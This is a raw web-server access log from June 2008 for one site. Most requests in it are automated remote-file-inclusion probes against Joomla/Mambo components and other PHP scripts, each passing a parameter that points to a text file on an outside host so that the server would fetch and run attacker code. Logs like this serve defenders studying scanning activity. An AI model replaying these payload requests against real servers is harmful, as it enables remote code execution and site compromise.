213.80.152.210 - - [25/Jun/2008:10:48:42 -0700] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.bucknellstudentgovernment.com/fuckrox-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.80.152.210 - - [25/Jun/2008:10:48:45 -0700] "GET /logs/access_080129.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.bucknellstudentgovernment.com/fuckrox-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.80.152.210 - - [25/Jun/2008:10:48:47 -0700] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.bucknellstudentgovernment.com/fuckrox-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.80.152.210 - - [25/Jun/2008:10:48:47 -0700] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.bucknellstudentgovernment.com/fuckrox-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.208.98.130 - - [25/Jun/2008:10:48:48 -0700] "GET /logs/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.208.98.130 - - [25/Jun/2008:10:48:48 -0700] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.208.98.130 - - [25/Jun/2008:10:48:52 -0700] "GET /logs/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.208.98.130 - - [25/Jun/2008:10:48:52 -0700] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.223.106.116 - - [25/Jun/2008:10:48:53 -0700] "GET //index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.centrogassystem.com/frn/id.txt?? HTTP/1.1" 200 3694 "-" "libwww-perl/5.805" "www.dmulk.com"
200.31.206.138 - - [25/Jun/2008:10:49:02 -0700] "GET /logs/access_080118.log/errors.php?error=http://201.70.9.109/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.80.152.210 - - [25/Jun/2008:10:50:49 -0700] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.bucknellstudentgovernment.com/fuckrox-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.80.152.210 - - [25/Jun/2008:10:50:49 -0700] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.bucknellstudentgovernment.com/fuckrox-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.70.204.99 - - [25/Jun/2008:10:50:50 -0700] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.70.204.99 - - [25/Jun/2008:10:50:50 -0700] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.98.156.151 - - [25/Jun/2008:10:52:02 -0700] "GET /logs/access_080117.log//modules/vwar/admin/admin.php?vwar_root=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.98.156.151 - - [25/Jun/2008:10:52:02 -0700] "GET /logs/access_080117.log//modules/vwar/admin/admin.php?vwar_root=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.98.156.151 - - [25/Jun/2008:10:52:02 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.98.156.151 - - [25/Jun/2008:10:52:02 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.98.156.151 - - [25/Jun/2008:10:52:02 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.98.156.151 - - [25/Jun/2008:10:52:02 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.98.156.151 - - [25/Jun/2008:10:52:08 -0700] "GET /logs/access_071229.log//modules/vwar/admin/admin.php?vwar_root=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.98.156.151 - - [25/Jun/2008:10:52:09 -0700] "GET /logs/access_071229.log//modules/vwar/admin/admin.php?vwar_root=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.98.156.151 - - [25/Jun/2008:10:52:13 -0700] "GET /logs/access_080211.log//modules/vwar/admin/admin.php?vwar_root=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.98.156.151 - - [25/Jun/2008:10:52:16 -0700] "GET /logs/access_080211.log//modules/vwar/admin/admin.php?vwar_root=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.195.42.191 - - [25/Jun/2008:10:52:37 -0700] "GET /logs/access_080312.log/?mosConfig_absolute_path=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.195.42.191 - - [25/Jun/2008:10:52:39 -0700] "GET /?mosConfig_absolute_path=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 200 18439 "-" "libwww-perl/5.803" "www.dmulk.com"
216.195.42.191 - - [25/Jun/2008:10:52:39 -0700] "GET /logs/?mosConfig_absolute_path=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 200 53419 "-" "libwww-perl/5.803" "www.dmulk.com"
216.195.42.191 - - [25/Jun/2008:10:52:40 -0700] "GET /logs/access_080312.log/administrator/components/com_mtree/config.mtree.php?mosConfig_absolute_path=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.195.42.191 - - [25/Jun/2008:10:52:40 -0700] "GET /administrator/components/com_mtree/config.mtree.php?mosConfig_absolute_path=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.195.42.191 - - [25/Jun/2008:10:52:40 -0700] "GET /logs/administrator/components/com_mtree/config.mtree.php?mosConfig_absolute_path=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
61.70.204.99 - - [25/Jun/2008:10:53:07 -0700] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.117.152.168 - - [25/Jun/2008:10:53:09 -0700] "GET /logs/access_080215.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.goodimmo.com/romid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
216.117.152.168 - - [25/Jun/2008:10:53:10 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.goodimmo.com/romid.txt??? HTTP/1.1" 200 50 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
216.117.152.168 - - [25/Jun/2008:10:53:11 -0700] "GET /logs/access_080215.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.goodimmo.com/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.117.152.168 - - [25/Jun/2008:10:53:11 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.goodimmo.com/romid.txt??? HTTP/1.1" 200 50 "-" "libwww-perl/5.65" "www.dmulk.com"
216.117.152.168 - - [25/Jun/2008:10:53:11 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.goodimmo.com/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
61.70.204.99 - - [25/Jun/2008:10:53:16 -0700] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
8.2.208.2 - - [25/Jun/2008:10:53:17 -0700] "GET /logs/access_080215.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.goodimmo.com/romid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
8.2.208.2 - - [25/Jun/2008:10:53:18 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.goodimmo.com/romid.txt???? HTTP/1.1" 200 50 "-" "libwww-perl/5.76" "www.dmulk.com"
8.2.208.2 - - [25/Jun/2008:10:53:18 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.goodimmo.com/romid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
8.2.208.2 - - [25/Jun/2008:10:53:20 -0700] "GET /logs/access_080215.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.goodimmo.com/romid.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
8.2.208.2 - - [25/Jun/2008:10:53:21 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.goodimmo.com/romid.txt???? HTTP/1.1" 200 50 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
89.108.67.192 - - [25/Jun/2008:10:53:21 -0700] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://alaskafamily.net/poll/me.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.67.192 - - [25/Jun/2008:10:53:24 -0700] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://alaskafamily.net/poll/me.txt?? HTTP/1.1" 200 18509 "-" "libwww-perl/5.805" "www.dmulk.com"
87.246.68.52 - - [25/Jun/2008:10:53:28 -0700] "GET /logs/access_080215.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.goodimmo.com/romid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
87.246.68.52 - - [25/Jun/2008:10:53:29 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.goodimmo.com/romid.txt??? HTTP/1.1" 200 50 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
218.239.223.69 - - [25/Jun/2008:10:53:32 -0700] "GET /logs/access_080312.log/administrator/components/com_mtree/config.mtree.php?mosConfig_absolute_path=http://www.sandmanwv.com/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.239.223.69 - - [25/Jun/2008:10:53:32 -0700] "GET /administrator/components/com_mtree/config.mtree.php?mosConfig_absolute_path=http://www.sandmanwv.com/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.239.223.69 - - [25/Jun/2008:10:53:32 -0700] "GET /logs/administrator/components/com_mtree/config.mtree.php?mosConfig_absolute_path=http://www.sandmanwv.com/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.246.68.52 - - [25/Jun/2008:10:53:54 -0700] "GET /logs/access_080215.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.goodimmo.com/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
87.246.68.52 - - [25/Jun/2008:10:53:55 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.goodimmo.com/romid.txt??? HTTP/1.1" 200 50 "-" "libwww-perl/5.800" "www.dmulk.com"
87.246.68.52 - - [25/Jun/2008:10:53:55 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.goodimmo.com/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
62.140.73.234 - - [25/Jun/2008:10:53:56 -0700] "GET /logs/access_080215.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.goodimmo.com/romid.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
62.140.73.234 - - [25/Jun/2008:10:53:57 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.goodimmo.com/romid.txt???? HTTP/1.1" 200 50 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
62.65.34.76 - - [25/Jun/2008:10:54:07 -0700] "GET /logs/access_080127.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://dj.caucasus.net/iddosi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.223.106.116 - - [25/Jun/2008:10:54:30 -0700] "GET /logs/access_080215.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.centrogassystem.com/frn/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
68.76.31.154 - - [25/Jun/2008:10:54:31 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://208.46.111.12/images/images.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.223.106.116 - - [25/Jun/2008:10:54:34 -0700] "GET //index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.centrogassystem.com/frn/id.txt?? HTTP/1.1" 200 3694 "-" "libwww-perl/5.805" "www.dmulk.com"
66.223.106.116 - - [25/Jun/2008:10:54:34 -0700] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.centrogassystem.com/frn/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
68.76.31.154 - - [25/Jun/2008:10:54:34 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://208.46.111.12/images/images.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.140.73.234 - - [25/Jun/2008:10:54:35 -0700] "GET /logs/access_080215.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.goodimmo.com/romid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.140.73.234 - - [25/Jun/2008:10:54:37 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.goodimmo.com/romid.txt???? HTTP/1.1" 200 50 "-" "libwww-perl/5.803" "www.dmulk.com"
62.140.73.234 - - [25/Jun/2008:10:54:37 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.goodimmo.com/romid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
218.239.223.69 - - [25/Jun/2008:10:54:55 -0700] "GET /logs/access_080312.log/?mosConfig_absolute_path=http://www.sandmanwv.com/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.239.223.69 - - [25/Jun/2008:10:54:58 -0700] "GET /?mosConfig_absolute_path=http://www.sandmanwv.com/echo.txt?? HTTP/1.1" 200 18409 "-" "libwww-perl/5.805" "www.dmulk.com"
218.239.223.69 - - [25/Jun/2008:10:54:58 -0700] "GET /logs/?mosConfig_absolute_path=http://www.sandmanwv.com/echo.txt?? HTTP/1.1" 200 53419 "-" "libwww-perl/5.805" "www.dmulk.com"
202.221.143.111 - - [25/Jun/2008:10:55:06 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
89.218.85.18 - - [25/Jun/2008:10:55:13 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.goodimmo.com/coi.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
89.218.85.18 - - [25/Jun/2008:10:55:14 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.goodimmo.com/coi.txt?? HTTP/1.1" 200 50 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
89.218.85.18 - - [25/Jun/2008:10:55:14 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.goodimmo.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
89.218.85.18 - - [25/Jun/2008:10:55:15 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.goodimmo.com/test.txt??? HTTP/1.1" 200 50 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
65.98.70.18 - - [25/Jun/2008:10:55:33 -0700] "GET /logs//components/com_hashcash/server.php?mosConfig_absolute_path=http://www.dichotomy.com.au/tmp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
65.98.70.18 - - [25/Jun/2008:10:55:34 -0700] "GET //components/com_hashcash/server.php?mosConfig_absolute_path=http://www.dichotomy.com.au/tmp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
193.239.211.19 - - [25/Jun/2008:10:55:47 -0700] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_unregister&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.richandrowdyretirement.com/rss.php/index.php/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
193.239.211.19 - - [25/Jun/2008:10:55:48 -0700] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_unregister&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.richandrowdyretirement.com/rss.php/index.php/boo.do??? HTTP/1.1" 200 50 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
74.55.76.110 - - [25/Jun/2008:10:55:51 -0700] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.guardianbeast.helloweb.eu/idbot5.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
74.55.76.110 - - [25/Jun/2008:10:55:53 -0700] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.guardianbeast.helloweb.eu/idbot5.txt?? HTTP/1.1" 200 18529 "-" "libwww-perl/5.812" "www.dmulk.com"
74.55.76.110 - - [25/Jun/2008:10:56:03 -0700] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.guardianbeast.helloweb.eu/idbot5.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
74.55.76.110 - - [25/Jun/2008:10:56:05 -0700] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.guardianbeast.helloweb.eu/idbot5.txt?? HTTP/1.1" 200 18529 "-" "libwww-perl/5.812" "www.dmulk.com"
217.148.95.147 - - [25/Jun/2008:10:56:10 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
61.63.1.134 - - [25/Jun/2008:10:56:12 -0700] "GET /logs/access.log//components/com_hashcash/server.php?mosConfig_absolute_path=http://www.sandmanwv.com/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.55.76.110 - - [25/Jun/2008:10:56:28 -0700] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.guardianbeast.helloweb.eu/idbot5.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
74.55.76.110 - - [25/Jun/2008:10:56:29 -0700] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.guardianbeast.helloweb.eu/idbot5.txt?? HTTP/1.1" 200 18529 "-" "libwww-perl/5.812" "www.dmulk.com"
67.195.37.185 - - [25/Jun/2008:10:56:31 -0700] "GET /logs/access_080127.log HTTP/1.0" 200 672308 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
89.111.176.84 - - [25/Jun/2008:10:56:47 -0700] "GET /logs/access_080117.log/index.php?pg=http://fan.sleepsycho.com/bajocdm2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.84 - - [25/Jun/2008:10:56:50 -0700] "GET /index.php?pg=http://fan.sleepsycho.com/bajocdm2.txt????? HTTP/1.1" 200 18413 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.84 - - [25/Jun/2008:10:56:51 -0700] "GET /logs/index.php?pg=http://fan.sleepsycho.com/bajocdm2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.52.139.226 - - [25/Jun/2008:10:56:52 -0700] "GET /logs/access_080109.log//components/com_hashcash/server.php?mosConfig_absolute_path=http://www.sandmanwv.com/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
83.98.156.151 - - [25/Jun/2008:10:57:29 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.98.156.151 - - [25/Jun/2008:10:57:30 -0700] "GET //skin/zero_vote/error.php?dir=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.98.156.151 - - [25/Jun/2008:10:57:42 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.98.156.151 - - [25/Jun/2008:10:57:45 -0700] "GET //skin/zero_vote/error.php?dir=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.34.140.215 - - [25/Jun/2008:10:58:02 -0700] "GET /logs/scanhttp://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.34.140.215 - - [25/Jun/2008:10:58:02 -0700] "GET /scanhttp://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
59.125.5.1 - - [25/Jun/2008:10:58:06 -0700] "GET /logs/index1.php?l=http://alieandrann.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
59.125.5.1 - - [25/Jun/2008:10:58:11 -0700] "GET /index1.php?l=http://alieandrann.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
193.239.211.19 - - [25/Jun/2008:10:59:02 -0700] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_user_extended&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.richandrowdyretirement.com/rss.php/index.php/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
193.239.211.19 - - [25/Jun/2008:10:59:02 -0700] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_user_extended&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.richandrowdyretirement.com/rss.php/index.php/boo.do??? HTTP/1.1" 200 50 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
81.208.98.130 - - [25/Jun/2008:10:59:26 -0700] "GET /logs/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.195.37.125 - - [25/Jun/2008:10:59:41 -0700] "GET /blog/index.php/category/ HTTP/1.0" 404 4643 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
81.208.98.130 - - [25/Jun/2008:10:59:41 -0700] "GET /logs/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.195.37.125 - - [25/Jun/2008:10:59:41 -0700] "GET /blog/wp-content/themes/default/style.css HTTP/1.0" 200 9232 "http://dmulk.com/blog/category/" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
